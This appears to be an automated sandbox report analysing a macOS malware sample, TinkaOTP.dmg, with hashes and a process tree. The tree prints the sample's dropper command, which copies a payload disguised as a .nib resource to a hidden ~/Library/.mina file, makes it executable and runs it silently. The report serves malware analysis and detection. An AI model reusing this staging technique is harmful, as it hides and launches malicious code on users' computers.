Resubmissions

06-05-2023 12:48

230506-p126bahb92 1

06-05-2023 12:30

230506-pptd2ahb52 1

12-06-2021 11:09

210612-nqn9qdfdq2 10

12-06-2021 11:04

210612-h83qfce7ax 10

12-06-2021 10:49

210612-mkbljdyans 10

04-06-2021 11:41

210604-617hnrwhna 10

03-06-2021 22:37

210603-9ndgvgx33n 10

03-06-2021 17:09

210603-gxrvff2tan 10

03-06-2021 16:24

210603-lv4d7lhgcs 10

Analysis

  • max time network
    155s
  • platform
    macos_amd64
  • resource
    macos
  • submitted
    03-06-2021 17:09

General

  • Target

    TinkaOTP.dmg

  • Size

    6.2MB

  • MD5

    81f8f0526740b55fe484c42126cd8396

  • SHA1

    fe83d95afce63e935dbe22aef40a164cee34f4e5

  • SHA256

    899e66ede95686a06394f707dd09b7c29af68f95d22136f0a023bfd01390ad53

  • SHA512

    751c2195a47d5e263ccfb860037ce32b5bc3c9ca516b9806a0cf1bae2af9742bcc3c9965218fd938e6c3eaa5a90081ece877aeec56f667477686daa3aeb6d77a

Score
10/10

Malware Config

Signatures

Processes

  • /bin/sh
    sh -c "sudo open /Volumes/TinkaOTP/TinkaOTP.app"
    1⤵
      PID:464
    • /bin/bash
      sh -c "sudo open /Volumes/TinkaOTP/TinkaOTP.app"
      1⤵
        PID:464
      • /usr/bin/sudo
        sudo open /Volumes/TinkaOTP/TinkaOTP.app
        1⤵
          PID:464
          • /usr/bin/open
            open /Volumes/TinkaOTP/TinkaOTP.app
            2⤵
              PID:465
          • /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
            /Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP
            1⤵
              PID:466
            • /bin/bash
              /bin/bash -c "cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib ~/Library/.mina > /dev/null 2>&1 && chmod +x ~/Library/.mina > /dev/null 2>&1 && ~/Library/.mina > /dev/null 2>&1"
              1⤵
                PID:469
                • /bin/cp
                  cp /Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib /Users/run/Library/.mina
                  2⤵
                    PID:470
                  • /bin/chmod
                    chmod +x /Users/run/Library/.mina
                    2⤵
                      PID:471
                    • /Users/run/Library/.mina
                      /Users/run/Library/.mina
                      2⤵
                        PID:472

Network

MITRE ATT&CK Matrix

Downloads

  • /Users/run/Library/.mina

    MD5

    f05437d510287448325bac98a1378de1

    SHA1

    fa3deb60b8a2eaa29a7dccf14bee6adae81f442f

    SHA256

    846d8647d27a0d729df40b13a644f3bffdc95f6d0e600f2195c85628d59f1dc6

    SHA512

    466999585e7b09e729def6e13c719b656ba7ee9ca43ea32c8fb3a6177de81a75caf9bd5eb0c0ac172c2b7fea3c1aa57d10349ff98aac472fe2ffafde8cd30165